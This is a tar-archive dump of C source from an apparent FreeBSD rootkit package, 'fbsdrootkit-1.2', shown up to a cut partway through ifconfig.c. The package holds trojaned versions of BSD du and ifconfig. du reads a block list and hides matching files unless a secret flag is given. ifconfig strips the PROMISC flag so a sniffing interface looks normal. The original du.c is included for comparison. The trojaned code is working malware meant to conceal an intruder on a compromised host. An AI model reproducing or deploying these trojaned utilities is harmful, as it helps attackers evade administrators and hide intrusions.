EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)du.c 8.4 (Berkeley) 4/1/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include /* Rootkit configuration files */ #include "../config.h" #include "../rootkitls.h" int linkchk __P((FTSENT *)); void usage __P((void)); int main(argc, argv) int argc; char *argv[]; { FTS *fts; FTSENT *p; long blocksize; int ftsoptions, listdirs, listfiles; int Hflag, Lflag, Pflag, aflag, ch, notused, rval, sflag; char **save; save = argv; Hflag = Lflag = Pflag = aflag = sflag = 0; ftsoptions = FTS_PHYSICAL; /* Add the show all option for arguement parsing if defined */ #if defined(SHOWFLAG) while ((ch = getopt(argc, argv, "HLPaksx/")) != EOF) #else while ((ch = getopt(argc, argv, "HLPaksx")) != EOF) #endif switch (ch) { case 'H': Hflag = 1; Lflag = Pflag = 0; break; case 'L': Lflag = 1; Hflag = Pflag = 0; break; case 'P': Pflag = 1; Hflag = Lflag = 0; break; case 'a': aflag = 1; break; case 'k': putenv("BLOCKSIZE=1024"); break; case 's': sflag = 1; break; case 'x': ftsoptions |= FTS_XDEV; break; /* Show all files if the capability is enabled */ #if defined(SHOWFLAG) case '/': showall++; break; #endif case '?': default: usage(); } argc -= optind; argv += optind; /* Read in a list of files to block */ if(!showall) file_block_list(); /* * XXX * Because of the way that fts(3) works, logical walks will not count * the blocks actually used by symbolic links. We rationalize this by * noting that users computing logical sizes are likely to do logical * copies, so not counting the links is correct. The real reason is * that we'd have to re-implement the kernel's symbolic link traversing * algorithm to get this right. If, for example, you have relative * symbolic links referencing other relative symbolic links, it gets * very nasty, very fast. The bottom line is that it's documented in * the man page, so it's a feature. */ if (Hflag) ftsoptions |= FTS_COMFOLLOW; if (Lflag) { ftsoptions &= ~FTS_PHYSICAL; ftsoptions |= FTS_LOGICAL; } if (aflag) { if (sflag) usage(); listdirs = listfiles = 1; } else if (sflag) listdirs = listfiles = 0; else { listfiles = 0; listdirs = 1; } if (!*argv) { argv = save; argv[0] = "."; argv[1] = NULL; } (void)getbsize(¬used, &blocksize); blocksize /= 512; if ((fts = fts_open(argv, ftsoptions, NULL)) == NULL) err(1, NULL); for (rval = 0; (p = fts_read(fts)) != NULL;) switch (p->fts_info) { case FTS_D: /* Ignore. */ break; case FTS_DP: p->fts_parent->fts_number += p->fts_number += p->fts_statp->st_blocks; /* * If listing each directory, or not listing files * or directories and this is post-order of the * root of a traversal, display the total. */ /* Check whether file should be blocked */ if (showall || !check_file(p->fts_path) && listdirs || !listfiles && !p->fts_level) (void)printf("%ld\t%s\n", howmany(p->fts_number, blocksize), p->fts_path); break; case FTS_DC: /* Ignore. */ break; case FTS_DNR: /* Warn, continue. */ case FTS_ERR: case FTS_NS: warnx("%s: %s", p->fts_path, strerror(p->fts_errno)); rval = 1; break; default: if (p->fts_statp->st_nlink > 1 && linkchk(p)) break; /* * If listing each file, or a non-directory file was * the root of a traversal, display the total. */ /* Check whether file should be blocked */ if (showall || !check_file(p->fts_path) && listfiles || !p->fts_level) (void)printf("%qd\t%s\n", howmany(p->fts_statp->st_blocks, blocksize), p->fts_path); p->fts_parent->fts_number += p->fts_statp->st_blocks; } if (errno) err(1, "fts_read"); exit(0); } typedef struct _ID { dev_t dev; ino_t inode; } ID; int linkchk(p) FTSENT *p; { static ID *files; static int maxfiles, nfiles; ID *fp, *start; ino_t ino; dev_t dev; ino = p->fts_statp->st_ino; dev = p->fts_statp->st_dev; if ((start = files) != NULL) for (fp = start + nfiles - 1; fp >= start; --fp) if (ino == fp->inode && dev == fp->dev) return (1); if (nfiles == maxfiles && (files = realloc((char *)files, (u_int)(sizeof(ID) * (maxfiles += 128)))) == NULL) err(1, ""); files[nfiles].inode = ino; files[nfiles].dev = dev; ++nfiles; return (0); } void usage() { (void)fprintf(stderr, "usage: du [-H | -L | -P] [-a | -s] [-k] [-x] [file ...]\n"); exit(1); } fbsdrootkit-1.2/du/du.c.dist100600 764 764 14013 6247414155 13310 0ustar dfdf/* * Copyright (c) 1989, 1993, 1994 * The Regents of the University of California. All rights reserved. * * This code is derived from software contributed to Berkeley by * Chris Newcomb. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1989, 1993, 1994\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)du.c 8.4 (Berkeley) 4/1/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #include int linkchk __P((FTSENT *)); void usage __P((void)); int main(argc, argv) int argc; char *argv[]; { FTS *fts; FTSENT *p; long blocksize; int ftsoptions, listdirs, listfiles; int Hflag, Lflag, Pflag, aflag, ch, notused, rval, sflag; char **save; save = argv; Hflag = Lflag = Pflag = aflag = sflag = 0; ftsoptions = FTS_PHYSICAL; while ((ch = getopt(argc, argv, "HLPaksx")) != EOF) switch (ch) { case 'H': Hflag = 1; Lflag = Pflag = 0; break; case 'L': Lflag = 1; Hflag = Pflag = 0; break; case 'P': Pflag = 1; Hflag = Lflag = 0; break; case 'a': aflag = 1; break; case 'k': putenv("BLOCKSIZE=1024"); break; case 's': sflag = 1; break; case 'x': ftsoptions |= FTS_XDEV; break; case '?': default: usage(); } argc -= optind; argv += optind; /* * XXX * Because of the way that fts(3) works, logical walks will not count * the blocks actually used by symbolic links. We rationalize this by * noting that users computing logical sizes are likely to do logical * copies, so not counting the links is correct. The real reason is * that we'd have to re-implement the kernel's symbolic link traversing * algorithm to get this right. If, for example, you have relative * symbolic links referencing other relative symbolic links, it gets * very nasty, very fast. The bottom line is that it's documented in * the man page, so it's a feature. */ if (Hflag) ftsoptions |= FTS_COMFOLLOW; if (Lflag) { ftsoptions &= ~FTS_PHYSICAL; ftsoptions |= FTS_LOGICAL; } if (aflag) { if (sflag) usage(); listdirs = listfiles = 1; } else if (sflag) listdirs = listfiles = 0; else { listfiles = 0; listdirs = 1; } if (!*argv) { argv = save; argv[0] = "."; argv[1] = NULL; } (void)getbsize(¬used, &blocksize); blocksize /= 512; if ((fts = fts_open(argv, ftsoptions, NULL)) == NULL) err(1, NULL); for (rval = 0; (p = fts_read(fts)) != NULL;) switch (p->fts_info) { case FTS_D: /* Ignore. */ break; case FTS_DP: p->fts_parent->fts_number += p->fts_number += p->fts_statp->st_blocks; /* * If listing each directory, or not listing files * or directories and this is post-order of the * root of a traversal, display the total. */ if (listdirs || !listfiles && !p->fts_level) (void)printf("%ld\t%s\n", howmany(p->fts_number, blocksize), p->fts_path); break; case FTS_DC: /* Ignore. */ break; case FTS_DNR: /* Warn, continue. */ case FTS_ERR: case FTS_NS: warnx("%s: %s", p->fts_path, strerror(p->fts_errno)); rval = 1; break; default: if (p->fts_statp->st_nlink > 1 && linkchk(p)) break; /* * If listing each file, or a non-directory file was * the root of a traversal, display the total. */ if (listfiles || !p->fts_level) (void)printf("%qd\t%s\n", howmany(p->fts_statp->st_blocks, blocksize), p->fts_path); p->fts_parent->fts_number += p->fts_statp->st_blocks; } if (errno) err(1, "fts_read"); exit(0); } typedef struct _ID { dev_t dev; ino_t inode; } ID; int linkchk(p) FTSENT *p; { static ID *files; static int maxfiles, nfiles; ID *fp, *start; ino_t ino; dev_t dev; ino = p->fts_statp->st_ino; dev = p->fts_statp->st_dev; if ((start = files) != NULL) for (fp = start + nfiles - 1; fp >= start; --fp) if (ino == fp->inode && dev == fp->dev) return (1); if (nfiles == maxfiles && (files = realloc((char *)files, (u_int)(sizeof(ID) * (maxfiles += 128)))) == NULL) err(1, ""); files[nfiles].inode = ino; files[nfiles].dev = dev; ++nfiles; return (0); } void usage() { (void)fprintf(stderr, "usage: du [-H | -L | -P] [-a | -s] [-k] [-x] [file ...]\n"); exit(1); } fbsdrootkit-1.2/bak/ 40700 764 764 0 6265021366 11577 5ustar dfdffbsdrootkit-1.2/ifconfig/ 40700 764 764 0 6257406127 12631 5ustar dfdffbsdrootkit-1.2/ifconfig/Makefile100600 764 764 216 6265015756 14352 0ustar dfdf# @(#)Makefile 8.1 (Berkeley) 6/5/93 PROG= ifconfig MAN8= ifconfig.8 LDADD= -lkvm DPADD= ${LIBKVM} CFLAGS+=-static .include fbsdrootkit-1.2/ifconfig/ifconfig.c100600 764 764 52251 6251637353 14706 0ustar dfdf/* * Copyright (c) 1983, 1993 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the University of * California, Berkeley and its contributors. * 4. Neither the name of the University nor the names of its contributors * may be used to endorse or promote products derived from this software * without specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ /* * 951109 - Andrew@pubnix.net - Changed to iterative buffer growing mechanism * for ifconfig -a so all interfaces are queried. * */ #ifndef lint static char copyright[] = "@(#) Copyright (c) 1983, 1993\n\ The Regents of the University of California. All rights reserved.\n"; #endif /* not lint */ #ifndef lint static char sccsid[] = "@(#)ifconfig.c 8.2 (Berkeley) 2/16/94"; #endif /* not lint */ #include #include #include #include #include #include #include #include #define NSIP #include #include #include #define EON #include #include #include #include #include #include #include #include #include #include #include #include #include struct ifreq ifr, ridreq; struct ifaliasreq addreq; struct iso_ifreq iso_ridreq; struct iso_aliasreq iso_addreq; struct sockaddr_in netmask; char name[30]; int flags; int metric; int mtu; int nsellength = 1; int setaddr; int setipdst; int doalias; int clearaddr; int newaddr = 1; int s; kvm_t *kvmd; extern int errno; int setifflags(), setifaddr(), setifdstaddr(), setifnetmask(); int setifmetric(), setifmtu(), setifbroadaddr(), setifipdst(); int notealias(), setsnpaoffset(), setnsellength(), notrailers(); #define NEXTARG 0xffffff struct cmd { char *c_name; int c_parameter; /* NEXTARG means next argv */ int (*c_func)(); } cmds[] = { { "up", IFF_UP, setifflags } , { "down", -IFF_UP, setifflags }, { "trailers", -1, notrailers }, { "-trailers", 1, notrailers }, { "arp", -IFF_NOARP, setifflags }, { "-arp", IFF_NOARP, setifflags }, { "debug", IFF_DEBUG, setifflags }, { "-debug", -IFF_DEBUG, setifflags }, { "alias", IFF_UP, notealias }, { "-alias", -IFF_UP, notealias }, { "delete", -IFF_UP, notealias }, #ifdef notdef #define EN_SWABIPS 0x1000 { "swabips", EN_SWABIPS, setifflags }, { "-swabips", -EN_SWABIPS, setifflags }, #endif { "netmask", NEXTARG, setifnetmask }, { "metric", NEXTARG, setifmetric }, { "broadcast", NEXTARG, setifbroadaddr }, { "ipdst", NEXTARG, setifipdst }, { "snpaoffset", NEXTARG, setsnpaoffset }, { "nsellength", NEXTARG, setnsellength }, { "link0", IFF_LINK0, setifflags }, { "-link0", -IFF_LINK0, setifflags }, { "link1", IFF_LINK1, setifflags }, { "-link1", -IFF_LINK1, setifflags }, { "link2", IFF_LINK2, setifflags }, { "-link2", -IFF_LINK2, setifflags }, { "normal", -IFF_LINK0, setifflags }, { "compress", IFF_LINK0, setifflags }, { "noicmp", IFF_LINK1, setifflags }, { "mtu", NEXTARG, setifmtu }, { 0, 0, setifaddr }, { 0, 0, setifdstaddr }, }; /* * XNS support liberally adapted from code written at the University of * Maryland principally by James O'Toole and Chris Torek. */ int in_status(), in_getaddr(); int xns_status(), xns_getaddr(); int iso_status(), iso_getaddr(); int ether_status(); /* Known address families */ struct afswtch { char *af_name; short af_af; int (*af_status)(); int (*af_getaddr)(); int af_difaddr; int af_aifaddr; caddr_t af_ridreq; caddr_t af_addreq; } afs[] = { #define C(x) ((caddr_t) &x) { "inet", AF_INET, in_status, in_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "ns", AF_NS, xns_status, xns_getaddr, SIOCDIFADDR, SIOCAIFADDR, C(ridreq), C(addreq) }, { "iso", AF_ISO, iso_status, iso_getaddr, SIOCDIFADDR_ISO, SIOCAIFADDR_ISO, C(iso_ridreq), C(iso_addreq) }, { "ether", AF_INET, ether_status, NULL }, { 0, 0, 0, 0 } }; struct afswtch *afp; /*the address family being set or asked about*/ main(argc, argv) int argc; char *argv[]; { int af = AF_INET; register struct afswtch *rafp; if (argc < 2) { fprintf(stderr, "usage: ifconfig interface\n%s%s%s%s%s%s", "\t[ af [ address [ dest_addr ] ] [ up ] [ down ]", "[ netmask mask ] ]\n", "\t[ metric n ]\n", "\t[ mtu n ]\n", "\t[ arp | -arp ]\n", "\t[ link0 | -link0 ] [ link1 | -link1 ] [ link2 | -link2 ] \n"); exit(1); } argc--, argv++; strncpy(name, *argv, sizeof(name)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); argc--, argv++; if (argc > 0) { for (afp = rafp = afs; rafp->af_name; rafp++) if (strcmp(rafp->af_name, *argv) == 0) { afp = rafp; argc--; argv++; break; } rafp = afp; af = ifr.ifr_addr.sa_family = rafp->af_af; } s = socket(af, SOCK_DGRAM, 0); if (s < 0) { perror("ifconfig: socket"); exit(1); } if (strstr(name, "-a")) { char *buffer; struct ifconf ifc; struct ifreq *ifptr, *end; int ifflags, selectflag = -1; int oldbufsize, bufsize = sizeof(struct ifreq); if (strstr(name, "-au")) selectflag = 1; if (strstr(name, "-ad")) selectflag = 0; buffer = malloc(bufsize); /* allocate first buffer */ ifc.ifc_len = bufsize; /* Initial setting */ /* * Itterate through here until we don't get any more data */ do { oldbufsize = ifc.ifc_len; bufsize += 1+sizeof(struct ifreq); buffer = realloc((void *)buffer, bufsize); ifc.ifc_len = bufsize; ifc.ifc_buf = buffer; if (ioctl(s, SIOCGIFCONF, (char *) &ifc) < 0) { perror("ifconfig (SIOCGIFCONF)"); exit (1); } } while (ifc.ifc_len > oldbufsize); ifflags = ifc.ifc_req->ifr_flags; end = (struct ifreq *) (ifc.ifc_buf + ifc.ifc_len); ifptr = ifc.ifc_req; while (ifptr < end) { sprintf(ifr.ifr_name,"%s",ifptr->ifr_name); sprintf(name,"%s",ifptr->ifr_name); close(s); if ((s = socket(af, SOCK_DGRAM, 0)) < 0) { perror("ifconfig: socket"); exit(1); } if (ifptr->ifr_flags == ifflags) ifconfig(argc,argv,af,rafp,selectflag); if(ifptr->ifr_addr.sa_len) /* Dohw! */ ifptr = (struct ifreq *) ((caddr_t) ifptr + ifptr->ifr_addr.sa_len - sizeof(struct sockaddr)); ifptr++; } free(buffer); } else ifconfig(argc,argv,af,rafp, -1); exit (0); } ifconfig(argc,argv,af,rafp,flag) int argc; char *argv[]; int af; struct afswtch *rafp; int flag; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } switch(flag) { case 0: if (ifr.ifr_flags & IFF_UP) return(0); break; case 1: if (!(ifr.ifr_flags & IFF_UP)) return(0); break; case -1: default: break; } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); flags = ifr.ifr_flags; if (ioctl(s, SIOCGIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMETRIC)"); else metric = ifr.ifr_metric; if (ioctl(s, SIOCGIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (SIOCGIFMTU)"); else mtu = ifr.ifr_mtu; if (argc == 0) { status(); return(0); } while (argc > 0) { register struct cmd *p; for (p = cmds; p->c_name; p++) if (strcmp(*argv, p->c_name) == 0) break; if (p->c_name == 0 && setaddr) p++; /* got src, do dst */ if (p->c_func) { if (p->c_parameter == NEXTARG) { if (argv[1] == NULL) errx(1, "'%s' requires argument", p->c_name); (*p->c_func)(argv[1]); argc--, argv++; } else (*p->c_func)(*argv, p->c_parameter); } argc--, argv++; } if (af == AF_ISO) adjust_nsellength(); if (setipdst && af==AF_NS) { struct nsip_req rq; int size = sizeof(rq); rq.rq_ns = addreq.ifra_addr; rq.rq_ip = addreq.ifra_dstaddr; if (setsockopt(s, 0, SO_NSIP_ROUTE, &rq, size) < 0) Perror("Encapsulation Routing"); } if (clearaddr) { int ret; strncpy(rafp->af_ridreq, name, sizeof ifr.ifr_name); if ((ret = ioctl(s, rafp->af_difaddr, rafp->af_ridreq)) < 0) { if (errno == EADDRNOTAVAIL && (doalias >= 0)) { /* means no previous address for interface */ } else Perror("ioctl (SIOCDIFADDR)"); } } if (newaddr) { strncpy(rafp->af_addreq, name, sizeof ifr.ifr_name); if (ioctl(s, rafp->af_aifaddr, rafp->af_addreq) < 0) Perror("ioctl (SIOCAIFADDR)"); } return(0); } #define RIDADDR 0 #define ADDR 1 #define MASK 2 #define DSTADDR 3 /*ARGSUSED*/ setifaddr(addr, param) char *addr; short param; { /* * Delay the ioctl to set the interface addr until flags are all set. * The address interpretation may depend on the flags, * and the flags may change when the address is set. */ setaddr++; if (doalias == 0) clearaddr = 1; (*afp->af_getaddr)(addr, (doalias >= 0 ? ADDR : RIDADDR)); } setifnetmask(addr) char *addr; { (*afp->af_getaddr)(addr, MASK); } setifbroadaddr(addr) char *addr; { (*afp->af_getaddr)(addr, DSTADDR); } setifipdst(addr) char *addr; { in_getaddr(addr, DSTADDR); setipdst++; clearaddr = 0; newaddr = 0; } #define rqtosa(x) (&(((struct ifreq *)(afp->x))->ifr_addr)) /*ARGSUSED*/ notealias(addr, param) char *addr; { if (setaddr && doalias == 0 && param < 0) bcopy((caddr_t)rqtosa(af_addreq), (caddr_t)rqtosa(af_ridreq), rqtosa(af_addreq)->sa_len); doalias = param; if (param < 0) { clearaddr = 1; newaddr = 0; } else clearaddr = 0; } /*ARGSUSED*/ notrailers(vname, value) char *vname; int value; { printf("Note: trailers are no longer sent, but always received\n"); } /*ARGSUSED*/ setifdstaddr(addr, param) char *addr; int param; { (*afp->af_getaddr)(addr, DSTADDR); } setifflags(vname, value) char *vname; short value; { if (ioctl(s, SIOCGIFFLAGS, (caddr_t)&ifr) < 0) { Perror("ioctl (SIOCGIFFLAGS)"); exit(1); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); flags = ifr.ifr_flags; if (value < 0) { value = -value; flags &= ~value; } else flags |= value; ifr.ifr_flags = flags; if (ioctl(s, SIOCSIFFLAGS, (caddr_t)&ifr) < 0) Perror(vname); } setifmetric(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_metric = atoi(val); if (ioctl(s, SIOCSIFMETRIC, (caddr_t)&ifr) < 0) perror("ioctl (set metric)"); } setifmtu(val) char *val; { strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); ifr.ifr_mtu = atoi(val); if (ioctl(s, SIOCSIFMTU, (caddr_t)&ifr) < 0) perror("ioctl (set mtu)"); } setsnpaoffset(val) char *val; { iso_addreq.ifra_snpaoffset = atoi(val); } #define IFFBITS \ "\020\1UP\2BROADCAST\3DEBUG\4LOOPBACK\5POINTOPOINT\6NOTRAILERS\7RUNNING\10NOARP\ \11PROMISC\12ALLMULTI\13OACTIVE\14SIMPLEX\15LINK0\16LINK1\17LINK2\20MULTICAST" /* * Print the status of the interface. If an address family was * specified, show it and it only; otherwise, show them all. */ status() { register struct afswtch *p = afp; short af = ifr.ifr_addr.sa_family; printf("%s: ", name); /* Simply XOR out the PROMISC flag if it's set */ printb("flags", (flags & IFF_PROMISC) ? (flags ^ IFF_PROMISC) : flags, IFFBITS); if (metric) printf(" metric %d", metric); if (mtu) printf(" mtu %d", mtu); putchar('\n'); if ((p = afp) != NULL) { (*p->af_status)(1); } else for (p = afs; p->af_name; p++) { ifr.ifr_addr.sa_family = p->af_af; (*p->af_status)(0); } } in_status(force) int force; { struct sockaddr_in *sin; char *inet_ntoa(); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } sin = (struct sockaddr_in *)&ifr.ifr_addr; printf("\tinet %s ", inet_ntoa(sin->sin_addr)); strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); if (ioctl(s, SIOCGIFNETMASK, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK)"); bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else netmask.sin_addr = ((struct sockaddr_in *)&ifr.ifr_addr)->sin_addr; if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_dstaddr; printf("--> %s ", inet_ntoa(sin->sin_addr)); } printf("netmask 0x%x ", ntohl(netmask.sin_addr.s_addr)); if (flags & IFF_BROADCAST) { if (ioctl(s, SIOCGIFBRDADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sin = (struct sockaddr_in *)&ifr.ifr_addr; if (sin->sin_addr.s_addr != 0) printf("broadcast %s", inet_ntoa(sin->sin_addr)); } putchar('\n'); } xns_status(force) int force; { struct sockaddr_ns *sns; close(s); s = socket(AF_NS, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } if (ioctl(s, SIOCGIFADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); } else perror("ioctl (SIOCGIFADDR)"); } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); sns = (struct sockaddr_ns *)&ifr.ifr_addr; printf("\tns %s ", ns_ntoa(sns->sns_addr)); if (flags & IFF_POINTOPOINT) { /* by W. Nesheim@Cornell */ if (ioctl(s, SIOCGIFDSTADDR, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_addr, sizeof(ifr.ifr_addr)); else Perror("ioctl (SIOCGIFDSTADDR)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); sns = (struct sockaddr_ns *)&ifr.ifr_dstaddr; printf("--> %s ", ns_ntoa(sns->sns_addr)); } putchar('\n'); } iso_status(force) int force; { struct sockaddr_iso *siso; struct iso_ifreq ifr; close(s); s = socket(AF_ISO, SOCK_DGRAM, 0); if (s < 0) { if (errno == EPROTONOSUPPORT) return; perror("ifconfig: socket"); exit(1); } bzero((caddr_t)&ifr, sizeof(ifr)); strncpy(ifr.ifr_name, name, sizeof(ifr.ifr_name)); if (ioctl(s, SIOCGIFADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL || errno == EAFNOSUPPORT) { if (!force) return; bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); } else { perror("ioctl (SIOCGIFADDR_ISO)"); exit(1); } } strncpy(ifr.ifr_name, name, sizeof ifr.ifr_name); siso = &ifr.ifr_Addr; printf("\tiso %s ", iso_ntoa(&siso->siso_addr)); if (ioctl(s, SIOCGIFNETMASK_ISO, (caddr_t)&ifr) < 0) { if (errno != EADDRNOTAVAIL) perror("ioctl (SIOCGIFNETMASK_ISO)"); } else { printf(" netmask %s ", iso_ntoa(&siso->siso_addr)); } if (flags & IFF_POINTOPOINT) { if (ioctl(s, SIOCGIFDSTADDR_ISO, (caddr_t)&ifr) < 0) { if (errno == EADDRNOTAVAIL) bzero((char *)&ifr.ifr_Addr, sizeof(ifr.ifr_Addr)); else Perror("ioctl (SIOCGIFDSTADDR_ISO)"); } strncpy(ifr.ifr_name, name, sizeof (ifr.ifr_name)); siso = &ifr.ifr_Addr; printf("--> %s ", iso_ntoa(&siso->siso_addr)); } putchar('\n'); } kread(addr, buf, size) u_long addr; char *buf; int size; { if (kvm_read(kvmd, addr, buf, size) != size) return (-1); return (0); } /* Unashamedly stolen from netstat -- maybe someday we can us sysctl() */ ether_status() { struct nlist nl[] = { { "_ifnet" } , "" }; u_long addr, addr2; struct ifnet ifnet; union { struct ifaddr ifa; struct in_ifaddr in; struct ns_ifaddr ns; struct iso_ifaddr iso; } ifaddr; char *cp; struct sockaddr *sa; struct sockaddr_dl *sdl; int n,m; char ifacename[IFNAMSIZ]; /* * If we fail here it probably means we don't have permission to * read /dev/kmem. Best to just silently bail out. If we have * an error *after* we succeed in opening /dev/kmem, then we * should report it. */ if ((kvmd = kvm_open(NULL,NULL,NULL,O_RDONLY,NULL)) == NULL) return; if (kvm_nlist(kvmd, nl) < 0 || nl[0].n_type == 0) { perror("ifconfig: kvm_nlist()"); return; } if (kread(nl[0].n_value, (char *)&addr, sizeof(addr))) { perror("_ifnet"); return; } addr2 = 0; while (addr || addr2) { if (addr2 == 0) { if (kread(addr, (char *)&ifnet, sizeof ifnet) || kread((u_long)ifnet.if_name, ifacename, IFNAMSIZ)){ perror("ifconfig: kvm_read()"); return; } addr = (u_long)ifnet.if_next; addr2 = (u_long)ifnet.if_addrlist; } if (kread(addr2, (char *)&ifaddr, sizeof ifaddr)) { addr2 = 0; continue; } sprintf(ifacename,"%s%d",ifacename, ifnet.if_unit); if (!strncmp(name, ifacename, strlen(name))) { #define CP(x) ((char *)(x)) cp = (CP(ifaddr.ifa.ifa_addr) - CP(addr2)) + CP(&ifaddr); sa = (struct sockaddr *)cp; if (sa->sa_family == AF_LINK) { sdl = (struct sockaddr_dl *)sa; cp = (char *)LLADDR(sdl); if ((n = sdl->sdl_alen) > 0) { printf ("\tether "); while (--n >= 0) m += printf("%02x%c", *cp++ & 0xff, n > 0 ? ':' : ' '); putchar('\n'); } break; } } addr2 = (u_long)ifaddr.ifa.ifa_next; } kvm_close(kvmd); } Perror(cmd) char *cmd; { extern int errno; switch (errno) { case ENXIO: errx(1, "%s: no such interface", cmd); break; case EPERM: errx(1, "%s: permission denied", cmd); break; default: err(1, "%s", cmd); } } struct in_addr inet_makeaddr(); #define SIN(x) ((struct sockaddr_in *) &(x)) struct sockaddr_in *sintab[] = { SIN(ridreq.ifr_addr), SIN(addreq.ifra_addr), SIN(addreq.ifra_mask), SIN(addreq.ifra_broadaddr)}; in_getaddr(s, which) char *s; { register struct sockaddr_in *sin = sintab[which]; struct hostent *hp; struct netent *np; int val; sin->sin_len = sizeof(*sin); if (which != MASK) sin->sin_family = AF_INET; if (inet_aton(s, &sin->sin_addr)) ; else if (hp = gethostbyname(s)) bcopy(hp->h_addr, (char *)&sin->sin_addr, hp->h_length); else if (np = getnetbyname(s)) sin->sin_addr = inet_makeaddr(np->n_net, INADDR_ANY); else errx(1, "%s: bad value", s); } /* * Print a value a la the %b format of the kernel's printf */ printb(s, v, bits) char *s; register char 